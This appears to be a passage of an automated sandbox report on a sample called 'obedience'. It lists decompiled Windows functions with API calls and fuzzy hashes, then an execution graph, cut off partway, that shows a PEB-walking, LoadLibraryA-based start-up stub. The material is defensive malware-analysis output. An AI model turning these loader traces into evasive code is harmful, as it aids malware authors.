      Function 6ED94C00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E6ED94C00(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr _t16;
				intOrPtr* _t19;
				intOrPtr _t24;
				intOrPtr _t27;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t34;

				_t34 = __ecx;
				_t10 =  *((intOrPtr*)(__ecx + 0x10));
				_t24 = _a4;
				if(_t10 < _t24) {
					_t10 = E6EDA298A("invalid string position");
				}
				_t31 = _a8;
				_t11 = _t10 - _t24;
				if(_t11 < _t31) {
					_t31 = _t11;
				}
				if(_t31 == 0) {
					L14:
					return _t34;
				} else {
					_t27 =  *((intOrPtr*)(_t34 + 0x14));
					if(_t27 < 0x10) {
						_t19 = _t34;
					} else {
						_t19 =  *_t34;
					}
					if(_t27 < 0x10) {
						_t28 = _t34;
					} else {
						_t28 =  *_t34;
					}
					L6ED95E80(_t28 + _t24, _t19 + _t24 + _t31, _t11 - _t31);
					_t16 =  *((intOrPtr*)(_t34 + 0x10)) - _t31;
					 *((intOrPtr*)(_t34 + 0x10)) = _t16;
					if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
						 *((char*)(_t34 + _t16)) = 0;
						goto L14;
					} else {
						 *((char*)( *_t34 + _t16)) = 0;
						return _t34;
					}
				}
			}












      0x6ed94c04
      0x6ed94c06
      0x6ed94c09
      0x6ed94c0f
      0x6ed94c16
      0x6ed94c16
      0x6ed94c1b
      0x6ed94c1e
      0x6ed94c22
      0x6ed94c24
      0x6ed94c24
      0x6ed94c28
      0x6ed94c7a
      0x6ed94c7f
      0x6ed94c2a
      0x6ed94c2a
      0x6ed94c31
      0x6ed94c37
      0x6ed94c33
      0x6ed94c33
      0x6ed94c33
      0x6ed94c3c
      0x6ed94c42
      0x6ed94c3e
      0x6ed94c3e
      0x6ed94c3e
      0x6ed94c4f
      0x6ed94c5a
      0x6ed94c60
      0x6ed94c64
      0x6ed94c76
      0x00000000
      0x6ed94c66
      0x6ed94c68
      0x6ed94c71
      0x6ed94c71
      0x6ed94c64

      APIs
      • std::_Xinvalid_argument.LIBCPMT ref: 6ED94C16
        • Part of subcall function 6EDA298A: std::exception::exception.LIBCMT ref: 6EDA299F
        • Part of subcall function 6EDA298A: __CxxThrowException@8.LIBCMT ref: 6EDA29B4
        • Part of subcall function 6EDA298A: std::exception::exception.LIBCMT ref: 6EDA29C5
      • _memmove.LIBCMT ref: 6ED94C4F
      Strings
      • invalid string position, xrefs: 6ED94C11
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
      • String ID: invalid string position
      • API String ID: 1785806476-1799206989
      • Opcode ID: ccf203b1eafd4031f428f8e4bd66945964f5eed0c1fca6c21bf434f8e72347a7
      • Instruction ID: 06fa0d0846c296b47c5e790f2cb72cfeae8b9b7507858c9d182787c4f2bdb0a9
      • Opcode Fuzzy Hash: ccf203b1eafd4031f428f8e4bd66945964f5eed0c1fca6c21bf434f8e72347a7
      • Instruction Fuzzy Hash: 6001DB713002115FD3248FECECD055EB7AADB85654724492DD191CB702D7B2DC4397A1
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00444CE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E00444CE4(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t41;
				void* _t46;

				_v5 = 1;
				_t45 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t46 = E00419CE8( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t46 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t46 = _t46 - 1;
						_t40 = E00419C84(_t45, _t41, _t46);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E004442C8(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t46 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}









      0x00444ced
      0x00444cfa
      0x00444d0d
      0x00444d11
      0x00444d61
      0x00444d61
      0x00444d13
      0x00444d13
      0x00444d13
      0x00444d1d
      0x00444d23
      0x00000000
      0x00444d2b
      0x00444d30
      0x00444d44
      0x00444d5b
      0x00000000
      0x00000000
      0x00444d5b
      0x00000000
      0x00444d5d
      0x00444d5d
      0x00000000
      0x00444d13
      0x00444d65
      0x00444d6e

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Rect$EqualIntersect
      • String ID: @
      • API String ID: 3291753422-2766056989
      • Opcode ID: 49e2f86785b09432fbc8fb17c1a699ece156651e464f809a47d83f4a535d0874
      • Instruction ID: 96c604251c54ca3a57d773fc6756e2f2d06e5342deca8a0050f10d6c1d342416
      • Opcode Fuzzy Hash: 49e2f86785b09432fbc8fb17c1a699ece156651e464f809a47d83f4a535d0874
      • Instruction Fuzzy Hash: E2118C71A042485BD711DA6CC885BDE7BECAF89318F044296FC44EB392D779ED0587D4
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0047F2D0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55COMMON
      Download Yara Rule
      C-Code - Quality: 64%
      			E0047F2D0(void* __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t37;
				void* _t44;
				void* _t47;

				_push(__ebx);
				_v8 = 0;
				_t44 = __eax;
				_push(_t47);
				_push(0x47f37b);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47 + 0xfffffff4;
				if( *((char*)(__eax + 0x300)) == 0) {
					_t16 =  *0x490c50; // 0x0
					E0047FD7C(_t16, __ebx, 0, "UpStartEx", __edi, __eax, __fp0);
					_push(0x404);
					_t18 =  *0x48f738; // 0x48f11c
					_push(_t18);
					L00465F1C();
					_t29 = _t18;
					if(_t18 != 0) {
						_v16 = 0;
						_v12 = 0;
						E0040A164("StarBurn_UpStartEx() failed, exception %d", 0,  &_v16,  &_v8);
						_t24 =  *0x490c50; // 0x0
						E0047FD7C(_t24, _t29, 0, _v8, __edi, _t44, __fp0);
						E0040CBEC(_v8, 1);
						E004043D0();
					}
					 *((char*)(_t44 + 0x300)) = 1;
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(0x47f382);
				return E00404A40( &_v8);
			}












      0x0047f2d6
      0x0047f2da
      0x0047f2dd
      0x0047f2e1
      0x0047f2e2
      0x0047f2e7
      0x0047f2ea
      0x0047f2f4
      0x0047f2fd
      0x0047f302
      0x0047f307
      0x0047f30c
      0x0047f311
      0x0047f312
      0x0047f317
      0x0047f31b
      0x0047f325
      0x0047f328
      0x0047f336
      0x0047f340
      0x0047f345
      0x0047f354
      0x0047f359
      0x0047f359
      0x0047f35e
      0x0047f35e
      0x0047f367
      0x0047f36a
      0x0047f36d
      0x0047f37a

      APIs
      • StarBurn_UpStartEx.STARBURN(0048F11C,00000404), ref: 0047F312
      Strings
      • StarBurn_UpStartEx() failed, exception %d, xrefs: 0047F331
      • UpStartEx, xrefs: 0047F2F8
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Burn_StarStart
      • String ID: StarBurn_UpStartEx() failed, exception %d$UpStartEx
      • API String ID: 3289349704-2336405461
      • Opcode ID: aabaef79e9323e5694d82e4de21333493d49e20ab48a72ed9d8258171a09a1aa
      • Instruction ID: f5cc1f42aabb814b6f928613fecb1e716dffad8fe5680306ab4916872375d34c
      • Opcode Fuzzy Hash: aabaef79e9323e5694d82e4de21333493d49e20ab48a72ed9d8258171a09a1aa
      • Instruction Fuzzy Hash: EC1106706086049FD715DB79D851ACE77E8EB48304F50C47AF509D7291DB389E08872C
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042D7D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
      Download Yara Rule
      C-Code - Quality: 68%
      			E0042D7D0(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x49092f != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x490910; // 0x42d7d0
					 *0x490910 = E0042D52C(3, _t15, "MonitorFromPoint", _t18, _t20);
					_t16 =  *0x490910(_a4, _a8, _t19);
				}
				return _t16;
			}












      0x0042d7d6
      0x0042d7e0
      0x0042d80a
      0x0042d813
      0x0042d83b
      0x0042d83b
      0x0042d815
      0x0042d815
      0x0042d81a
      0x00000000
      0x00000000
      0x0042d81a
      0x0042d7e2
      0x0042d7e7
      0x0042d7f4
      0x0042d806
      0x0042d806
      0x0042d846

      APIs
      • GetSystemMetrics.USER32 ref: 0042D81E
      • GetSystemMetrics.USER32 ref: 0042D830
        • Part of subcall function 0042D52C: GetProcAddress.KERNEL32(75BA0000,00000000), ref: 0042D5B0
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MetricsSystem$AddressProc
      • String ID: MonitorFromPoint
      • API String ID: 1792783759-1072306578
      • Opcode ID: fceb17176bff4f997dbfbf20607a6347ff685c3a4e4c8991f75ca1fd88df6831
      • Instruction ID: 2756e11eb847ced657889ba680d9332bce9c9e3530b02444c1025df721020c62
      • Opcode Fuzzy Hash: fceb17176bff4f997dbfbf20607a6347ff685c3a4e4c8991f75ca1fd88df6831
      • Instruction Fuzzy Hash: 710186B1B05228AFEB006F55FC44B6B7B65EB94354F90403BF9249B252C3B5AD41CBAC
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0044CCDC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
      Download Yara Rule
      C-Code - Quality: 72%
      			E0044CCDC(void* __eax, intOrPtr __ecx, intOrPtr __edx, void* __eflags, char _a4) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				void* _t22;
				void* _t28;

				_v8 = __ecx;
				_t28 = __eax;
				_t22 = 0;
				if(E004519AC(__eax) != 0) {
					_t32 = __edx -  *((intOrPtr*)(_t28 + 0x6c));
					if(__edx !=  *((intOrPtr*)(_t28 + 0x6c))) {
						E0044CD40(_t28, _t32);
						 *((intOrPtr*)(_t28 + 0x6c)) = __edx;
						_t5 =  &_a4; // 0x4429e4
						E0044CACC(__edx,  *_t5, _v8,  &_v16);
						_t7 =  &_v12; // 0x4429e4
						_push( *_t7);
						_push(_v16);
						_push( *((intOrPtr*)(_t28 + 0x6c)));
						L0042D04C();
						asm("sbb ebx, ebx");
						_t22 = __edx + 1;
					}
				}
				return _t22;
			}








      0x0044cce5
      0x0044ccea
      0x0044ccec
      0x0044ccf7
      0x0044ccf9
      0x0044ccfc
      0x0044cd00
      0x0044cd07
      0x0044cd0e
      0x0044cd16
      0x0044cd1b
      0x0044cd1e
      0x0044cd22
      0x0044cd26
      0x0044cd27
      0x0044cd2f
      0x0044cd31
      0x0044cd31
      0x0044ccfc
      0x0044cd3a

      APIs
        • Part of subcall function 0044CD40: 6F92B200.COMCTL32(?,00000000,0044CD05,00000000,00000000,00000000), ref: 0044CD58
        • Part of subcall function 0044CACC: ClientToScreen.USER32(?,0044CD88), ref: 0044CAE4
        • Part of subcall function 0044CACC: GetWindowRect.USER32 ref: 0044CAEE
      • 6F92B190.COMCTL32(?,?,)D,?,00000000,00000000,00000000), ref: 0044CD27
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: B190B200ClientRectScreenWindow
      • String ID: )D$)D
      • API String ID: 3682328974-3292006183
      • Opcode ID: 0c8c0fd642da6d5169b2de8b825491a4017b1cc2f6f3e75f77eaa196e2b859e1
      • Instruction ID: d853629e1e9610805d31f89e0e2309f386e532a7c1029cddc8b05386dedac752
      • Opcode Fuzzy Hash: 0c8c0fd642da6d5169b2de8b825491a4017b1cc2f6f3e75f77eaa196e2b859e1
      • Instruction Fuzzy Hash: 47F062B7F011096B8750DE9E88C19AEF7ADEB48214B08457BF918D3312D638ED0587E9
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0042D6A8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
      Download Yara Rule
      C-Code - Quality: 68%
      			E0042D6A8(intOrPtr* _a4, signed int _a8) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr* _t14;
				intOrPtr _t16;
				signed int _t17;
				void* _t18;
				void* _t19;

				_t17 = _a8;
				_t14 = _a4;
				if( *0x49092e != 0) {
					_t19 = 0;
					if((_t17 & 0x00000003) != 0 ||  *((intOrPtr*)(_t14 + 8)) > 0 &&  *((intOrPtr*)(_t14 + 0xc)) > 0 && GetSystemMetrics(0) >  *_t14 && GetSystemMetrics(1) >  *((intOrPtr*)(_t14 + 4))) {
						_t19 = 0x12340042;
					}
				} else {
					_t16 =  *0x49090c; // 0x42d6a8
					 *0x49090c = E0042D52C(2, _t14, "MonitorFromRect", _t16, _t18);
					_t19 =  *0x49090c(_t14, _t17);
				}
				return _t19;
			}











      0x0042d6ae
      0x0042d6b1
      0x0042d6bb
      0x0042d6e0
      0x0042d6e9
      0x0042d710
      0x0042d710
      0x0042d6bd
      0x0042d6c2
      0x0042d6cf
      0x0042d6dc
      0x0042d6dc
      0x0042d71b

      APIs
      • GetSystemMetrics.USER32 ref: 0042D6F9
      • GetSystemMetrics.USER32 ref: 0042D705
        • Part of subcall function 0042D52C: GetProcAddress.KERNEL32(75BA0000,00000000), ref: 0042D5B0
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MetricsSystem$AddressProc
      • String ID: MonitorFromRect
      • API String ID: 1792783759-4033241945
      • Opcode ID: 18a4978411d993aef22aea4af093b1309794ded8472015a9976919a87443e792
      • Instruction ID: 142e77f389e1ad9ae2035b73dc54c463843e76110aa0c426e94ab48e580e06b5
      • Opcode Fuzzy Hash: 18a4978411d993aef22aea4af093b1309794ded8472015a9976919a87443e792
      • Instruction Fuzzy Hash: 42014BB5B001289FE7108F15F889B66B779EB98355F948177E904DB203D77CEC408BA8
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0048A918 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
      Download Yara Rule
      C-Code - Quality: 48%
      			E0048A918(void* __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v12;
				char* _t16;
				intOrPtr* _t17;
				intOrPtr _t33;
				intOrPtr _t36;

				_push(0);
				_push(0);
				_push(_t36);
				_push(0x48a990);
				_push( *[fs:eax]);
				 *[fs:eax] = _t36;
				E00444928( *((intOrPtr*)(__eax + 0x310)),  &_v12);
				E00404D4C( &_v8, _v12, "mailto:");
				_t16 = E00404F00(_v8);
				_t17 =  *0x48f840; // 0x490b7c
				_t6 =  *_t17 + 0x30; // 0xe036e
				ShellExecuteA( *_t6, "open", _t16, 0, 0, 0xa);
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(0x48a997);
				E00404A40( &_v12);
				return E00404A40( &_v8);
			}









      0x0048a91b
      0x0048a91d
      0x0048a924
      0x0048a925
      0x0048a92a
      0x0048a92d
      0x0048a93f
      0x0048a94f
      0x0048a957
      0x0048a962
      0x0048a969
      0x0048a96d
      0x0048a974
      0x0048a977
      0x0048a97a
      0x0048a982
      0x0048a98f

      APIs
      • ShellExecuteA.SHELL32(000E036E,open,00000000,00000000,00000000,0000000A), ref: 0048A96D
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: ExecuteShell
      • String ID: mailto:$open
      • API String ID: 587946157-2326261162
      • Opcode ID: 59c07894d3df8b09a49102c22413fb79189a8ad4c2afaa12cd8c139bd5f55ff5
      • Instruction ID: 2051d81a7cc7dd484b594133b7b61de164b48aad915d72833bbc34794b022b8d
      • Opcode Fuzzy Hash: 59c07894d3df8b09a49102c22413fb79189a8ad4c2afaa12cd8c139bd5f55ff5
      • Instruction Fuzzy Hash: 06014F70754304BFE701EB51DC42F5D77A8EB89704F6108B6F600AB691D6B869009A1D
      Uniqueness

      Uniqueness Score: -1.00%

      Function 0043CF58 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON
      Download Yara Rule
      C-Code - Quality: 100%
      			E0043CF58(void* __eax, void* __edx) {
				char* _t5;
				void* _t14;
				void* _t18;
				long _t19;

				_t18 = __edx;
				_t14 = __eax;
				_t5 =  *0x48f73c; // 0x490ae0
				if( *_t5 == 0 ||  *(__eax + 0x3c) == 0) {
					return E00404A94(_t18,  *((intOrPtr*)(_t14 + 0x78)));
				} else {
					SendMessageA(GetParent( *(__eax + 0x3c)), 0x465, 0x105, _t19);
					return E00409C4C(_t19, _t18);
				}
			}







      0x0043cf60
      0x0043cf62
      0x0043cf64
      0x0043cf6c
      0x00000000
      0x0043cf74
      0x0043cf8b
      0x00000000
      0x0043cf94

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmpDownload File
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: MessageParentSend
      • String ID: I
      • API String ID: 928151917-299795746
      • Opcode ID: 0142628ee414ed20a919c13fd7383048f05a25e2d4e5df825e8f5212456c81e4
      • Instruction ID: f388f313ec8b4d21780ebb60136cd6795ac0396d1493a1fe681495d92cfa8d28
      • Opcode Fuzzy Hash: 0142628ee414ed20a919c13fd7383048f05a25e2d4e5df825e8f5212456c81e4
      • Instruction Fuzzy Hash: EEE0E5B1B045005BEB54AA6DCCC6B5A328D8B49314F504073B540EF2D2EAB89C81C78A
      Uniqueness

      Uniqueness Score: -1.00%

      Execution Graph

      Execution Coverage:2.8%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:1.6%
      Total number of Nodes:381
      Total number of Limit Nodes:9
      execution_graph 46646 3000019 46648 300002b GetPEB 46646->46648 46652 3000105 46648->46652 46649 3000bd8 46650 3000473 46649->46650 46654 4b5beee 46649->46654 46651 3000abc LoadLibraryA 46651->46652 46652->46649 46652->46650 46652->46651 46655 4b5befe 46654->46655 46656 4b5bef9 46654->46656 46660 4b5bdf8 46655->46660 46672 4b66783 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 46656->46672 46659 4b5bf0c 46659->46650 46661 4b5be04 _Maklocchr 46660->46661 46662 4b5be51 46661->46662 46664 4b5bea1 _Maklocchr 46661->46664 46673 4b5bc94 46661->46673 46662->46664 46725 4b51a94 CreateEventW 46662->46725 46664->46659 46667 4b5bc94 149 API calls 46667->46664 46668 4b51a94 315 API calls 46669 4b5be78 46668->46669 46670 4b5bc94 149 API calls 46669->46670 46671 4b5be81 46670->46671 46671->46664 46671->46667 46672->46655 46674 4b5bca0 _Maklocchr 46673->46674 46675 4b5bd22 46674->46675 46676 4b5bca8 46674->46676 46678 4b5bd83 46675->46678 46681 4b5bd28 46675->46681 46730 4b5e948 HeapCreate 46676->46730 46679 4b5bd88 46678->46679 46682 4b5bde1 46678->46682 46745 4b5eae9 TlsGetValue 46679->46745 46680 4b5bcad 46684 4b5bcb8 46680->46684 46692 4b5bcb1 _Maklocchr 46680->46692 46685 4b5bd46 46681->46685 46681->46692 46740 4b5b86a 66 API calls _Maklocchr 46681->46740 46682->46692 46768 4b5eded 79 API calls 46682->46768 46731 4b5ee5b 86 API calls ~ctype 46684->46731 46690 4b5bd5a 46685->46690 46741 4b66368 67 API calls ~ctype 46685->46741 46744 4b5bd6d 70 API calls 46690->46744 46692->46662 46694 4b5bcbd 46697 4b5bcc1 46694->46697 46702 4b5bccd GetCommandLineA 46694->46702 46732 4b5e966 HeapDestroy 46697->46732 46698 4b5bd50 46742 4b5eb3a 70 API calls ~ctype 46698->46742 46699 4b5bda5 RtlDecodePointer 46707 4b5bdba 46699->46707 46733 4b666ec 71 API calls 2 library calls 46702->46733 46703 4b5bcc6 46703->46692 46704 